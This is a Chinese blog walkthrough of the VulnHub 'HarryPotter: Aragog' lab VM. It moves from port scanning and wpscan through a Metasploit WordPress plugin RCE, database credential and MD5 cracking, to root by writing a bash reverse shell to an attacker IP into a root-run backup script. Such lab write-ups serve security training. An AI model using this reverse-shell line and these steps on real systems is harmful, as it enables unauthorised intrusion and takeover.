Vulnhub项目:Aragog

这篇具有很好参考价值的文章主要介绍了Vulnhub项目:Aragog。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1、靶机地址:

HarryPotter: Aragog (1.0.2) ~ VulnHub

死亡圣器三部曲之第一部,Aragog是海格养的蜘蛛的名字, 并且又牵扯到了密室

2、渗透过程 

确定靶机ip,攻击机ip,扫描靶机开放端口

Vulnhub项目:Aragog

 只有22,80端口,对80端口进行目录爆破,发现是wordpress框架Vulnhub项目:Aragog

 这里给了提示,说明是wordpress plugins存在一些可利用的点Vulnhub项目:Aragog

 Vulnhub项目:Aragog

 查看源代码,发现域名,打开hosts,将靶机ip与域名进行绑定Vulnhub项目:Aragog

下一步就是利用wpscan去扫描查看,这里需要加入api-token才能扫出更多的东西,可以自己去官网注册一个,然后将自己的api-token复制下来就ok 

 wpscan --url http://192.168.56.143/blog --api-token=xxxxx -e p --plugins-detection aggressive

自己去免费注册一个就行WPScan: WordPress Security Scanner

Vulnhub项目:Aragog

 使用命令进行扫描Vulnhub项目:Aragog

 Vulnhub项目:Aragog

 Vulnhub项目:Aragog

 发现存在的还听很多,这里有个RCE,就用它,可以去查看该漏洞怎么用,反弹shell到kali本地,也可以用msfconsole进行攻击,搜索相关的模块Vulnhub项目:Aragog

 选择1,然后进行参数的设定Vulnhub项目:Aragog

 完全设置好后,进行runVulnhub项目:Aragog

 攻击成功,建立了连接Vulnhub项目:Aragog

 查看uid,然后进入shell,将其变为交互式shellVulnhub项目:Aragog

 进行一番查看,发现了一个用户,hagrid98,里面存在第一个魂器,查看发现是base64编码Vulnhub项目:Aragog

 那就解码一下Vulnhub项目:Aragog

 RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets

这是伏地魔的那个日记

下一步就是进行提权,wordpress在安装的时候会存在默认配置文件,进行一下搜索,发现了wordpress文件,进入后看到了默认配置文件,配置文件中有账户密码 

Vulnhub项目:Aragog

 发现了数据库的用户和密码,进入数据库拿一下有用的信息Vulnhub项目:Aragog

 发现用户名和密码,密码md5加密,破解下Vulnhub项目:Aragog

Vulnhub项目:Aragog

MD5免费在线解密破解_MD5在线加密-SOMD5

利用ssh远程一下这个用户,连接成功,以该用户进行提取操作,发现没什么东西可以用

Vulnhub项目:Aragog

 这边利用个提取辅助脚本,进行探测,在本地开启web服务,利用远程ssh,下载提权辅助脚本Vulnhub项目:Aragog

对其进行赋权

Vulnhub项目:Aragog

执行后,没什么太大的发现。换一个提权辅助脚本 

Vulnhub项目:Aragog

 执行Vulnhub项目:Aragog

 Vulnhub项目:Aragog

 执行发现了一个备份的脚本,它是在一段时间进行备份操作,执行的用户属性是root,那就直接讲下面反弹shell的代码写入这个备份文件Vulnhub项目:Aragog

 echo 'bash -i >& /dev/tcp/192.168.56.136/7899 0>&1'>/opt/.backup.sh

然后执行上面的备份脚本的操作,在kali本地监听,反弹成功,提权至root,发现了第二个魂器 

Vulnhub项目:Aragog

第一部中存在了两个魂器,自此渗透结束 

3、总结

对于该靶机的渗透进行总结,总体的思路还是收集信息,对可以利用的框架进行漏洞扫描,中间有一些小细节,灵活多变,总体思路不变,最后是在正常的提权步骤下,没有想法了,利用到提权辅助脚本,发现了存在的备份文件。最好还是自己进行提权信息的收集和探测,最后没有办法了,再利用脚本进行辅助。

后续带来哈利波特死亡圣器的第二部和第三部靶机!文章来源地址https://www.toymoban.com/news/detail-495568.html

到了这里,关于Vulnhub项目:Aragog的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(32)
  • Vulnhub靶机:driftingblues 4

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues4(10.0.2.20) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 使用nmap主机发现靶机ip: 10.0.2.20 使用nmap端口扫描发现靶机开放端口: 21、22、80 打开网站没有可利用的功能点,并且

    2024年02月01日
    浏览(39)
  • Vulnhub:DerpNStink 1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问 通过wpscan枚举出目标存在admin用户 尝试弱口令admin,登录到wordpress后台,在后台发现插件Slideshow存在任意

    2024年02月08日
    浏览(44)
  • Vulnhub: blogger:1靶机

    kali:192.168.111.111 靶机:192.168.111.176 端口扫描 在80端口的 /assets/fonts/ 目录下发现blog目录,访问后发现为wordpress 利用wpscan发现wordpress插件 wpdiscuz 存在任意文件上传漏洞 msf进行漏洞利用 vagrant用户的密码同样为vagrant vagrant用户sudo权限 提升为root flag

    2024年02月14日
    浏览(28)
  • Vulnhub: bassamCTF: 1靶机

    kali:192.168.111.111 靶机:192.168.111.210 端口扫描 修改hosts文件 爆破出子域名 welcome 对子域目录爆破 index.php 存在文件读取 查看 /etc/passwd 和 config.php 用 config.php 中的账号密码登录ssh,账号: test ,密码: test123 查看test用户的历史命令发现文件 MySecretPassword MySecretPassword 文件内容

    2024年02月11日
    浏览(30)
  • Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(26)
  • Vulnhub: Corrosion靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 目录爆破 blog-post目录下存在两个目录 对archives目录中的randylogs.php进行测试发现存在文件包含 成功包含ssh日志 利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell 文件包含ssh日志文件执行反弹shell 在/var/backups目录下发现us

    2024年02月09日
    浏览(30)
  • Vulnhub: DarkHole:1靶机

    kali:192.168.111.111 靶机:192.168.111.130 端口扫描 访问目标web网站,注册用户 注册时尝试注册用户名为admin的用户,发现存在该用户 进入用户后台,利用burp抓包越权修改其他用户的密码 admin用户密码被修改 经过测试,phtml后缀的文件可以上传并且被当成脚本执行 查找suid权限的

    2024年02月11日
    浏览(26)
  • vulnhub靶机02-Breakout

    主机发现 arp-scan -l 扫描端口 nmap --min-rate 10000 -p- 192.168.21.143 扫描端口信息 nmap -sV -sT -O -p80,139,445,10000,20000 192.168.21.143 漏洞扫描 nmap --script=vuln -p80,139,445,10000,20000 192.168.21.143 先看网站 什么都没有看看f12 找到点好东西 解码看看 Brainfuck/OoK加密解密 - Bugku CTF 这个应该没用了,再去

    2024年02月10日
    浏览(32)
  • vulnhub靶机Misdirection

    下载链接:https://download.vulnhub.com/misdirection/Misdirection.zip 解压后双击ovf文件导入虚拟机 网络:DHCP、NAT、192.168.100.0/24网段 192.168.100.133是新增的ip 发现开放了以上端口,继续扫描端口详细信息 扫描的同时去访问一下80和8080端口看看 80是正常的网站 8080是apache默认页 进行目录扫描

    2024年02月02日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包